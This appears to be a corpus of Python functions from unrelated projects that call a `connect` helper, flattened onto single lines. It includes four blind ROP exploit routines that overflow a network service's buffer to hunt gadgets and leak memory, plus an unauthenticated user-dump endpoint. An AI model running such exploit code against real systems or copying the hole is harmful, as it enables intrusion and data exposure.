def api_vote(): from flask import request _id = request.args.get('_id', None) if not _id: return json.dumps(list(utils.connect('vote').find({}))) vote = dict(utils.connect('vote').find_one({"_id": _id})) return json.dumps(vote)
def main(): connection = connect("localhost") stdout.write("Connecting to queue...") channel = connection.channel() channel.queue_declare(queue="hello") stdout.write("Established.\n") msg = None stdout.write("\nEnter a message. To exit press CTRL+C.\n") while True: try: if not msg: msg = input(">>> ") channel.basic_publish(exchange="", routing_key="hello", body=msg.encode()) msg = None except KeyboardInterrupt: stdout.write("\n") connection.close() break except pika.exceptions.AMQPError: connection = connect("localhost") channel = connection.channel() continue
def dashboard(): sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) s['user_obj'] = dict( utils.connect('user').find_one({"_id": s['user']})) payload.append(s) payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:50] for s in payload: s['all_votes'] = [] votes = utils.connect('vote').find({"session": s["_id"]}) for v in votes: vote = dict(v) user = dict(utils.connect('user').find_one({"_id": vote['user']})) for x in ['login_hash', 'updated', 'password']: del user[x] vote['user'] = user vote['vote_time'] = datetime.datetime.fromtimestamp( vote['created']) vote['user_time'] = datetime.datetime.fromtimestamp( user['created']) s['all_votes'].append(vote) return render_template('dashboard.html', sessions=payload, VOTING=True)
def dashboard(methods=['GET']): sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) s['user_obj'] = dict(utils.connect('user').find_one({"_id": s['user']})) payload.append(s) payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:25] for s in payload: s['all_votes'] = [] # votes = utils.connect('vote').find({"session": s["_id"]}) # for v in votes: # vote = dict(v) # user = dict(utils.connect('user').find_one({"_id": vote['user']})) # for x in ['login_hash', 'updated', 'password']: # del user[x] # vote['user'] = user # vote['vote_time'] = datetime.datetime.fromtimestamp(vote['created']) # vote['user_time'] = datetime.datetime.fromtimestamp(user['created']) # s['all_votes'].append(vote) return render_template('dashboard.html', sessions=payload, VOTING=True)
def main(): global args, node, contract, account, w3 args = parse_cli_arguments() # print(args) logging._info = logging.info if args.verbose: logging.info = default_logging_info else: logging.info = trimmed_logging_info w3 = utils.connect() if args.node_idx < -1 or args.node_idx >= len(w3.eth.accounts): logging.error( 'invalid node-idx specified, check that the specified account is available in Ganache' ) account = w3.eth.accounts[args.node_idx] if args.cmd == 'deploy': deploy() elif args.cmd == 'run': w3 = utils.connect() contract = utils.get_contract('DKG', args.contract) node = EthNode(account) node.connect(contract) run()
def main(): """Extracts or transforms and loads the data at the users request.""" while True: cmd = get_command() if cmd == "C": print("\nDrop then re-create all tables (~1 minute)") cur, conn = connect() create_tables(cur, conn) elif cmd == "L": # load data print("\nLoading data (~20 minutes)") cur, conn = connect() load_staging_tables(cur, conn) elif cmd == "I": # insert data print("\nInserting data (~2 minutes)") cur, conn = connect() insert_tables(cur, conn) elif cmd == "Q": break conn.close()
def index(): if settings.VOTING: sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) user = utils.connect('user').find_one({"_id": s['user']}) s['user_obj'] = dict( utils.connect('user').find_one({"_id": s['user']})) s['username'] = user['name'] payload.append(s) random.shuffle(payload) return render_template('session_list.html', sessions=payload, VOTING=settings.VOTING, ACTIVE=settings.ACTIVE) else: return render_template('create_session.html', VOTING=settings.VOTING, ACTIVE=settings.ACTIVE)
def dashboard(secret_key, methods=['GET']): if secret_key == os.environ.get('API_KEY', None): sessions = utils.connect('session').find({}) payload = [] for s in sessions: try: s = dict(s) s['user_obj'] = dict(utils.connect('user').find_one({"_id": s['user']})) payload.append(s) except: pass payload = sorted(payload, key=lambda x: x['votes'], reverse=True)[:100] for s in payload: s['all_votes'] = [] votes = utils.connect('vote').find({"session": s["_id"]}) for v in votes: vote = dict(v) user = dict(utils.connect('user').find_one({"_id": vote['user']})) for x in ['login_hash', 'updated', 'password']: del user[x] vote['user'] = user vote['vote_time'] = datetime.datetime.fromtimestamp(vote['created']) vote['user_time'] = datetime.datetime.fromtimestamp(user['created']) s['all_votes'].append(vote) return render_template('dashboard.html', sessions=payload, VOTING=True) return json.dumps({})
def api_session(): from flask import request _id = request.args.get('_id', None) if not _id: return json.dumps(list(utils.connect('session').find({}))) session = dict(utils.connect('session').find_one({"_id": _id})) return json.dumps(session)
def __init__(self, *args, **kwargs): connect("ranking_updated", self.edit_leaderboard) connect("game_registered", self.send_game_result) self.player_manager = None self.ranking = None self.is_ready = False # Determine if the bot is ready to process commands super().__init__(*args, **kwargs)
def index(): sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) user = utils.connect('user').find_one({"_id": s['user']}) s['username'] = user['name'] payload.append(s) return render_template('session_list.html', sessions=sorted(payload, key=lambda x: x['votes'], reverse=True), VOTING=settings.VOTING)
def api_user(): from flask import request _id = request.args.get('_id', None) if not _id: return json.dumps(list(utils.connect('user').find({}))) user = dict(utils.connect('user').find_one({"_id": _id})) for x in ['login_hash', 'updated', 'created', 'password', 'fingerprint']: del user[x] return json.dumps(user)
def update_records(self): votes = utils.connect('vote') sessions = utils.connect('session') self.sessions_voted_for = [ x['session'] for x in list(votes.find({"user": self._id})) ] self.sessions_pitched = [ x['_id'] for x in list(sessions.find({"user": self._id})) ] self.save()
def index(): sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) s['user_obj'] = dict(utils.connect('user').find_one({"_id": s['user']})) payload.append(s) payload = sorted(payload, key=lambda x: x['votes'], reverse=True) return render_template('session_list.html', sessions=payload)
def index(): sessions = utils.connect('session').find({}) payload = [] for s in sessions: s = dict(s) s['user_obj'] = dict( utils.connect('user').find_one({"_id": s['user']})) payload.append(s) payload = sorted(payload, key=lambda x: x['votes'], reverse=True) return render_template('session_list.html', sessions=payload)
def homepage(): utils.connect() if request.method == "GET": return render_template("musicboxhome.html"); else: global current_user button = str(request.form["button"]) if button == "Login": user = request.form.get("login-or-register") current_user = utils.add_or_view_user(user) session["user"]=current_user songs = utils.get_songs(current_user) return redirect("/"+current_user)
def check_voters(): unique = [] duplicates = [] for u in utils.connect('user').find({}): if u['fingerprint'] in unique: duplicates.append(u['fingerprint']) else: unique.append(u['fingerprint']) for d in duplicates: print(d) print([(u['name'], u['email'], u['created'], len(u['sessions_voted_for'])) for u in utils.connect('user').find({"fingerprint": d}) if len(u['sessions_voted_for']) > 0])
def session_action(methods=['GET']): from flask import request _id = request.args.get('user', None) user = None session_dict = {} session_dict['title'] = request.args.get('title', None) session_dict['description'] = request.args.get('description', None) session_dict['votes'] = 0 session_dict['accepted'] = False error = json.dumps({ "success": False, "text": "Please send a valid user ID and a session title and description." }) if not _id: return json.dumps(error) if _id: user = dict(utils.connect('user').find_one({"_id": _id})) session_dict['user'] = _id s = models.Session(**session_dict).save() tally() return json.dumps({ "success": True, "action": "create", "session": s['_id'] })
def delete_syllabs_tables(student=None): db = connect() if student is None: db.student_syllabs.drop() else: db.student_syllabs.delete_many({"student": student}) return True, ""
def user_action(methods=['GET']): from flask import request email = request.args.get('email', None) password = request.args.get('password', None) not_found = json.dumps({"success": False, "text": "Username or password is incorrect."}) user = utils.connect('user').find_one({ "email": email }) if not user: name = request.args.get('name', None) fingerprint = request.args.get('fingerprint', None) if not name or not fingerprint: return not_found u = models.User(email=email, name=name, password=password, fingerprint=fingerprint) u.save() return json.dumps({"success": True, "_id": u._id, "name": u.name, "votes": "|".join(u.sessions_voted_for), "action": "register"}) else: user_dict = dict(user) u = models.User(**user_dict) if u.auth_user(password): return json.dumps({"success": True, "_id": u._id, "name": u.name, "votes": "|".join(u.sessions_voted_for), "action": "login"}) return not_found
def init(dirs, archived=True): statuses, msgs = [], [] if not dir_exists("logs"): os.makedirs("logs") db = connect() clean_dir = dirs["to"] ref_dir = dirs["ref"] archived_dir = dirs["old"] if dir_empty(dirs["to"]): msg = "No files found found in {}. Aborting.".format(dirs["to"]) # logger.critical(msg) return False, msg if archived is True: if not dir_exists(archived): os.makedirs(archived) # dump(archived_dir) dump_and_drop(archived_dir) insert_datasets(clean_dir, True) # print(status, msg) # statuses.append(status) # msgs.append(msg) insert_students(clean_dir, ref_dir) # msgs.append(msg) # statuses.append(status) insert_path(ref_dir) # statuses.append(status) # msgs.append(msg) # print(status, msg) return True, ""
def main(): global postgres_connection global rabbit_connection global cur rabbit_connection = connect("rabbit") stdout.write("Connecting to queue...") channel = rabbit_connection.channel() channel.queue_declare(queue='hello') channel.basic_consume(callback, queue='hello', no_ack=True) stdout.write("Established.\n") stdout.write("Connecting to database...") postgres_connection = psycopg2.connect(host="db", user="******", password="******", dbname="ivbelkin_db") cur = postgres_connection.cursor() stdout.write("Established.\n") stdout.write("Creating table 'ivbelkin_db'...") cur.execute("CREATE TABLE IF NOT EXISTS ivbelkin_db (data varchar);") postgres_connection.commit() stdout.write("Completed.\n") stdout.write("Waiting for messages.\n") try: channel.start_consuming() except KeyboardInterrupt: cur.close() postgres_connection.close()
def getStopGadgets(pad, base_addr, ref, debug=False): log.info(f'searching stop gadgets, base addr = {hex(base_addr)}') L = [] # found addresses start = 0x0 end = start + 0x1500 for i in range(start, end): r = connect() try: # build payload addr = base_addr + i pld = b'X' * pad # fill buffer pld += p64(addr) # rip debugInfo(f'searching stop gadgets, trying {hex(addr)}', debug) # send pld and check if ref is in output r.recv(timeout=timeout) r.send(pld) res = r.recv(timeout=timeout) if ref in res: L.append(addr) # this address is a stop gadget except: # we crashed, close socket and continue pass disconnect(r) return L # return found stop gadgets
def leakData(ref, pad, pop_rdi, puts_addr, leak_addr, stop_gadget, debug): r = connect() debugInfo(f'leaking data at addr {hex(leak_addr)}', debug) # build payload pld = b'X' * pad # fill buffer pld += p64(pop_rdi) + p64(leak_addr) # load addr we want to leak in `rdi` pld += p64(puts_addr) # puts addr with the arg we control pld += p64(stop_gadget) # stop gadget # send payload r.recv(timeout=0.1) r.send(pld) # if no more output try: rec = r.recv(timeout=timeout) except: return None data = b'\x00' try: # parse output to get the leak data = rec[rec.index(b'@') + 1:rec.index(b'\n' + ref)] except: # null byte pass # close socket and return the leak disconnect(r) return data if data else b'\x00'
def getSrcTableData(srcTable, strtSK, endSK): global next_token try: resultSet = None conn = utils.connect(logger, dbEngine, dbEndpoint, dbPort, dbMisc, dbUser, dbPwd) conn.outputtypehandler = OutputTypeHandler cur = conn.cursor() sql = sq.srcTableQyery[srcTable] sql = sql.replace('<MIN_SK_NM>', str(strtSK)) sql = sql.replace('<MAX_SK_NM>', str(endSK)) #print(sql) resultSet = utils.queryDB(logger, dbEngine, conn, sql, cur) status = True except Exception as e: next_token = logger.writeLog( 'Error', 'Error on getSrcTableData function for query: ', srcTable, e, nextToken=next_token) # printException(logObj) status = False return resultSet, status
def tables(action, student=None): '''TABLES function to create, delete OR update the table in order of declaration in settings.TABLES ''' # LOGGING logger = logging.getLogger() logger.setLevel(logging.DEBUG) formatter = logging.Formatter( '%(asctime)s :: %(levelname)s :: %(message)s') file_handler = RotatingFileHandler(os.path.join(LOG_DIR, 'tables.log'), 'a', 1000000, 1) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(formatter) logger.addHandler(file_handler) msg = "" if action in ["create", "update"]: db = connect() if db.records.count() == 0: msg = "No records in database. Aborting" logger.critical("No records in database. Aborting") return False, msg logger.info("stats.main.tables(action={}, student={})".format( action, student)) if action == "update": for table_name in STATS_TABLES: table(table_name, "delete", student) for table_name, req in zip(STATS_TABLES, REQUIRED_TABLES): table(table_name, "create", student, req) else: for table_name, req in zip(STATS_TABLES, REQUIRED_TABLES): table(table_name, action, student, req) return True, msg
def __init__(self,tag,device='/dev/xvdf',mount='/data'): tag = tag.split(':') self.tag = {'key':tag[0],'value':tag[1]} self.c = utils.connect(boto.ec2.EC2Connection) self.this_instance = utils.get_this_instance() self.device = device self.mount = mount
def getBropGadgets(pad, base_addr, ref, stop_gadgets, debug): stop_gadget = stop_gadgets[0] log.info(f'searching BROP gadgets, base addr = {hex(base_addr)}') start = 0 end = start + 0x2000 L = [] # iterate over the whole ELF for i in range(start, end): r = connect() try: # build payload addr = base_addr + i pld = b'X' * pad # fill buffer pld += p64(addr) # overwrite `rip` with gadget pld += p64(0) * 6 # 6 addresses popped into registers pld += p64(stop_gadget) # regain exec flow control with the `ret` debugInfo(f'searching brop gadgets, trying {hex(addr)}', debug) # send payload and receive response r.recv(timeout=timeout) r.send(pld) res = r.recv(timeout=timeout) if ref in res: # /!\ be careful with false positives /!\ if addr not in stop_gadgets: L.append(addr) except: # we crashed, close socket and continue pass disconnect(r) return L # return found BROP gadgets
def __init__(self, tag, device='/dev/xvdf', mount='/data'): tag = tag.split(':') self.tag = {'key': tag[0], 'value': tag[1]} self.c = utils.connect(boto.ec2.EC2Connection) self.this_instance = utils.get_this_instance() self.device = device self.mount = mount
def main(env): # Load configuration config = utils.load_config(env) mysql_config = config["mysql"] # Print DB info print(f"Environment : {env}") print(f"MySQL host : {mysql_config['host']}:{mysql_config['port']}") print(f"MySQL database : {mysql_config['db']}") # Connect to database db_connection = utils.connect(mysql_config) # Get a cursor db_cursor = db_connection.cursor() # Run multiple statements for statement in utils.get_sql("db_init.sql").split("==="): if len(statement) > 0: # print(statement) db_cursor.execute(statement) # List database tables db_cursor.execute("SHOW TABLES") for table in db_cursor: print(table) # Close the cursor db_cursor.close() # Close the connection to database db_connection.close()
def __init__(self, options, columns): super(PymcacheFDW, self).__init__(options, columns) # row_id column name if 'row_id' in options: self._row_id_name = options['row_id'] else: self._row_id_name = columns.keys()[0] log_to_postgres( 'Using first column as row_id name: %s' % self._row_id_name, WARNING) # "expire" value if 'expire' in options and options['expire'] is not None: self._expire = int(options['expire']) else: log_to_postgres('Using default "expire" value: %s' % self._expire, WARNING) # "prefix" value self._prefix = options.get('prefix', '') if self._prefix is None: self._prefix = '' self._prefix_size = len(self._prefix) log_to_postgres('Using "prefix" value: %s' % self._prefix, WARNING) self._client = utils.connect(options)
def do_dns(self, options): "Get information about dns for every server" self.do_checkup(None) # List of servers from do_conn function ssh = utils.connect(self.servers) argv = options.split(' ') # If -f option is passed write to xboard.log and return if argv[0] == '-f': utils.filewrite('dns', ssh, self.servers) return # If an unknown option is passed display an error message and # return elif argv[0] != '-f' and argv[0] != '': print("Error: Unknown argument '%s' for command dns!" % argv[0]) return sshLength = len(ssh) # Go through the list and execute the command for # every server for i in range(0, sshLength): ssh_stdin, ssh_stdout, ssh_stderr = ssh[i].exec_command('dns') for line in ssh_stdout.read().splitlines(): print(line.decode('utf-8').replace(systemPrompt, '')) for linerr in ssh_stderr.read().splitlines(): print ('%s at %s on port %s' % (linerr.decode('utf-8').replace(systemPrompt, ''), \ self.servers['server'][i], self.servers['port'][i])) ssh[i].close()
def player_player_id_card_id(player_id,card_id): with connect() as conn, conn.cursor() as cursor: short_params = (player_id,) long_params = (player_id,card_id) #update_player query_update = """ UPDATE player SET has_played = true WHERE player_id = %s """ cursor.execute(query_update,short_params) #insert card query_insert = """ INSERT INTO played_card (player_id, card_id) VALUES (%s,%s) ON CONFLICT DO NOTHING """ #delete card query_delete = """ DELETE FROM player_hand WHERE player_id = %s AND card_id = %s """ cursor.execute(query_insert,long_params) cursor.execute(query_delete,long_params) return redirect(f'/player/{player_id}')
def insProcessTrack(lastSK, ProcessTable): global next_token try: resultSet = None conn = utils.connect(logger, dbEngine, dbEndpoint, dbPort, dbMisc, dbUser, dbPwd) cur = conn.cursor() sql = sq.sqlProcTrackQryIns sql = sql.replace('<LAST_SK>', str(lastSK)) sql = sql.replace('<TABLE_NM>', ProcessTable) resultSet = utils.queryDB(logger, dbEngine, conn, sql, cur, True) #utils.queryDB(logger, dbEngine, conn, sql, cur, True, True, jsonList) status = True except Exception as e: next_token = logger.writeLog('Error', 'Error on insProcessTrack function', e, nextToken=next_token) # printException(logObj) status = False return resultSet, status
def getPutsAddr(pad, stop_gadget, pop_rdi, base_addr, debug): # iterate over the whole ELF start = 0x0 end = start + 0x2000 log.info(f'searching puts addr, base addr = {hex(base_addr)}') for i in range(start, end): r = connect() try: # build payload addr = base_addr + i pld = b'X' * pad # fill buffer pld += p64(pop_rdi) # load `pop rdi; ret` opcodes in `rdi` pld += p64(pop_rdi) # puts arg = '\x5f\xc3' pld += p64(addr) # puts addr pld += p64(stop_gadget) # stop gadget # send payload and receive response debugInfo(f'searching puts addr, trying {hex(addr)}', debug) r.recv(timeout=timeout) r.send(pld) res = r.recv(timeout=timeout) if b'\x5f\xc3' in res: return addr except: # we crashed, close socket and continue pass disconnect(r) # fail, the BROP gadget is not correct return None
def connect(self): conn = connect( host=self.db.host, db=self.db.name, user=self.db.user, passwd=self.db.passwd) self._connection = conn return conn
def provision(self): """ Provision route53 A records based on the tag "Name" of all instances in the network. - Assumes private housted route53 zone - instances without a "Name" tag are silently skipped - instances not in a 'running' state are silently skipped - creates A record based on the "Name" tag - an A record may contain multiple private IPs :return: None """ zone = self.conn.get_zone(self.zone) assert zone, "No hosted zones found" # Group instances by their tag "Name" instances = utils.connect(boto.ec2.EC2Connection).get_only_instances( filters={ 'instance-state-name': 'running', 'vpc-id': utils.get_this_instance().vpc_id } ) network_map = {} for instance in instances: name = instance.tags.get('Name').lower() if name is None: continue if name not in network_map: network_map[name] = [] network_map[name].append(instance.private_ip_address) current_records = { r.name.replace(self.zone, '').strip('.'): r for r in zone.get_records() } # Create any new records for new_record_name in set(network_map).difference(current_records): zone.add_a( name='{0}.{1}'.format(new_record_name, self.zone), value=network_map.pop(new_record_name), # list is safe to pass ttl=30, ) # Update any records that need to be updated for update_record_name in network_map.keys(): record_value = network_map.pop(update_record_name) if set(current_records[update_record_name].resource_records) != \ set(record_value): zone.update_a( name='{0}.{1}'.format(update_record_name, self.zone), value=record_value, ttl=30, ) assert len(network_map) == 0, "network_map has unused " \ "entries: {0}".format(network_map)
def tally(): collection = utils.connect("session") sessions = list(collection.find({})) for session_dict in sessions: s = Session(session_dict) s.update_records() print "Updated %s sessions." % len(sessions)
def tally(): collection = utils.connect("user") users = list(collection.find({})) for user_dict in users: u = User(user_dict) u.update_records() print "Updated %s users." % len(users)
def share_marketplace(snapshot_id, region): conn = utils.connect(region) log.debug('getting snapshot - %s', snapshot_id) snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0] log.debug('sharing with marketplace') snapshot.share(user_ids=['679593333241']) log.info('shared with marketplace - %s', snapshot_id)
def __init__(self,tag,key,ec2_user,script,script_args): tag = tag.split(':') self.tag = {'key':tag[0],'value':tag[1]} self.key = os.path.abspath(key) self.script = os.path.abspath(script) self.tmpfile = 'userscript_{time}.sh'.format( time=datetime.datetime.utcnow().strftime('%m.%d.%Y_%H:%M:%S') ) self.user = ec2_user self.c = utils.connect(boto.ec2.connection.EC2Connection) self.script_args = script_args
def main(): logging.basicConfig(level=logging.DEBUG) parser = setup_parser() options = parser.parse_args() env = connect(options.env_name) for i in range(options.offset, options.offset+options.count): container_name = "%s-m%d" % (options.env_name, i) log.info("Creating container %s", container_name) add_container(env, container_name, options.base_name)
def share_public(ami_id, region): conn = utils.connect(region) log.debug('setting image to public - %s', ami_id) conn.modify_image_attribute( ami_id, attribute='launchPermission', operation='add', groups=['all']) log.info('set image to public - %s' % ami_id)
def copy_image(ami_id, ami_name, ami_region, regions=[]): images = [] for region in regions: log.debug('copying %s (%s) to %s', ami_id, ami_region, region) conn = utils.connect(region) ret = conn.copy_image(ami_region, ami_id, ami_name) image = Image(ret.image_id, region) images.append(image) log.info('pending %s (%s) to %s (%s)', ami_id, ami_region, image.id, region) return images
def login(username): global current_user global current_artist global current_artistID utils.connect() if request.method == "GET": songs = utils.get_songs(current_user) current_user=session["user"] return render_template("login.html",user=current_user,songs=songs) else: button = str(request.form["button"]) if button == "Close account": utils.remove_user(current_user) return redirect("/") elif button == "Search": current_artist = request.form.get("search") current_artistID = str(musicservices.getID( musicservices.getArtistInfo( utils.curate(current_artist)))) session["artist"]=current_artist session["aID"]=current_artistID return redirect("/"+current_user+"/"+current_artistID)
def register(ami_name, region, bucket=None, desc=None, arch=None): desc = desc if desc else utils.parse_imagename(ami_name)['url'] bucket = bucket if bucket else "turnkeylinux-" + region image_location = os.path.join(bucket, ami_name + ".manifest.xml") log.debug('registering image - %s', image_location) conn = utils.connect(region) ami_id = conn.register_image( name=ami_name, description=desc, image_location=image_location) log.info('registered image - %s %s', ami_id, image_location) return ami_id
def register(snapshot_id, region, arch, size=None, name=None, desc=None, pvm=False): conn = utils.connect(region) if None in (name, size): log.debug('getting snapshot - %s', snapshot_id) snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0] size = size if size else snapshot.volume_size name = name if name else snapshot.description virt = 'hvm' kernel_id = None device_base = '/dev/xvd' ec2_arch = "x86_64" if arch == "amd64" else arch if pvm: kernel_id = utils.get_kernel(region, arch) virt = 'paravirtual' device_base = '/dev/sd' name += '-pvm' log.debug('creating block_device_map') block_device_map = BlockDeviceMapping() rootfs = BlockDeviceType() rootfs.delete_on_termination = True rootfs.size = size rootfs.snapshot_id = snapshot_id rootfs_device_name = device_base + 'a' block_device_map[rootfs_device_name] = rootfs ephemeral = BlockDeviceType() ephemeral.ephemeral_name = 'ephemeral0' ephemeral_device_name = device_base + 'b' block_device_map[ephemeral_device_name] = ephemeral log.debug('registering image - %s', name) ami_id = conn.register_image( name=name, description=desc, kernel_id=kernel_id, architecture=ec2_arch, root_device_name=rootfs_device_name, block_device_map=block_device_map, virtualization_type=virt) log.info('registered image - %s %s %s', ami_id, name, region) return ami_id, name
def remove_fakes(): votes = utils.connect('vote').find({}) count = 0 for vote in votes: user = utils.connect('user').find_one({"_id": vote['user']}) if user['fingerprint'] == "2505346121": utils.connect('vote').remove({"user": user['_id'], "session": vote['session']}) utils.connect('user').remove({"_id": user['_id']}) count += 1 print("Removed user %s, vote %s, #%s" % (user['name'], vote['_id'], count))
def email_validate(request, token): cnx = connect() if not cnx: messages.add_message(request, messages.ERROR, 'Error validando email. Por favor, intenta nuevamente.') logger.critical('Unable to connect to Mongo Engine.') return redirect('/') reg = cnx.reg_token.find_one({'token': token, 'used': False}) if reg: email = reg['email'] cnx.reg_token.update({'token': token}, {'$set': {'used': True}}) user = Users.objects.get(email=email) user.is_active = 1 user.save() messages.add_message(request, messages.SUCCESS, 'Email validado. ¡Ahora puedes ingresar a Giviu!') return redirect('base_login') messages.add_message(request, messages.WARNING, 'Solicitud No Válida.') return redirect('base_login')
def register(snapshot_id, region, arch, size=None, name=None, desc=None): conn = utils.connect(region) if None in (name, size): log.debug("getting snapshot - %s", snapshot_id) snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0] size = size if size else snapshot.volume_size name = name if name else snapshot.description ec2_arch = "x86_64" if arch == "amd64" else arch log.debug("creating block_device_map") block_device_map = BlockDeviceMapping() rootfs = BlockDeviceType() rootfs.delete_on_termination = True rootfs.size = size rootfs.snapshot_id = snapshot_id rootfs_device_name = "/dev/xvda" block_device_map[rootfs_device_name] = rootfs ephemeral = BlockDeviceType() ephemeral.ephemeral_name = "ephemeral0" ephemeral_device_name = "/dev/xvdb" block_device_map[ephemeral_device_name] = ephemeral log.debug("registering image - %s", name) ami_id = conn.register_image( name=name, description=desc, architecture=ec2_arch, root_device_name=rootfs_device_name, block_device_map=block_device_map, virtualization_type="hvm", ) log.info("registered image - %s %s %s", ami_id, name, region) return ami_id, name
def register(snapshot_id, region, size=None, arch=None, name=None, desc=None): conn = utils.connect(region) log.debug('getting snapshot - %s', snapshot_id) snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0] size = size if size else snapshot.volume_size name = name if name else snapshot.description desc = desc if desc else utils.parse_imagename(name)['url'] arch = arch if arch else utils.parse_imagename(name)['architecture'] kernel_id = utils.get_kernel(region, arch) arch_ec2 = "x86_64" if arch == "amd64" else arch log.debug('creating block_device_map') rootfs = BlockDeviceType() rootfs.delete_on_termination = True rootfs.size = size rootfs.snapshot_id = snapshot_id ephemeral = BlockDeviceType() ephemeral.ephemeral_name = 'ephemeral0' block_device_map = BlockDeviceMapping() block_device_map['/dev/sda1'] = rootfs block_device_map['/dev/sda2'] = ephemeral log.debug('registering image - %s', name) ami_id = conn.register_image( name=name, description=desc, architecture=arch_ec2, kernel_id=kernel_id, root_device_name="/dev/sda1", block_device_map=block_device_map) log.info('registered image - %s %s %s', ami_id, name, region) return ami_id
def main(): logging.basicConfig(level=logging.DEBUG) parser = setup_parser() options = parser.parse_args() env = connect(options.env_name) output = subprocess.check_output(["sudo", "lxc-ls"]) containers = output.strip().split("\n") containers = [c for c in containers if c.startswith('%s-m' % options.env_name)] log.info("Destroy containers %s", " ".join(containers)) for c in containers: subprocess.check_output([ "sudo", "lxc-destroy", "--force", "-n", c]) m = env.status() machines = m['Machines'].keys() machines.remove('0') log.info("Terminating machines in juju %s", " ".join(machines)) env.destroy_machines(machines, force=True)
def __init__(self, region=None): self.region = region if region else utils.get_region() self.conn = utils.connect(self.region) self.vol = None self.device = None
def __init__(self, zone): self.zone = zone self.conn = utils.connect(boto.route53.Route53Connection)
import re from nltk.classify import NaiveBayesClassifier from nltk.tokenize import TweetTokenizer from nltk.corpus import stopwords from nltk.collocations import BigramCollocationFinder from nltk.metrics import BigramAssocMeasures from nltk.probability import FreqDist, ConditionalFreqDist from utils import Twitter, connect # Define global variable _bestwords, used during feature extraction _bestwords = None # connect to mongo db handle = connect() # Set global variable _bestwords, used during feature extraction def init_bestwords(): print "Defining _bestwords.." global _bestwords _bestwords = get_best_words() def get_best_words(): tokenizer = TweetTokenizer() # Analyze frequencies word_fd = FreqDist() label_word_fd = ConditionalFreqDist()
def update_records(self): votes = utils.connect("vote") self.votes = votes.find({"session": self._id}).count() self.save()
def commit_to_db(self, collection): self.updated = time.mktime(datetime.now().timetuple()) collection = utils.connect(collection) result = collection.save(self.to_dict()) return result
def update_records(self): votes = utils.connect("vote") sessions = utils.connect("session") self.sessions_voted_for = [x["session"] for x in list(votes.find({"user": self._id}))] self.sessions_pitched = [x["_id"] for x in list(sessions.find({"user": self._id}))] self.save()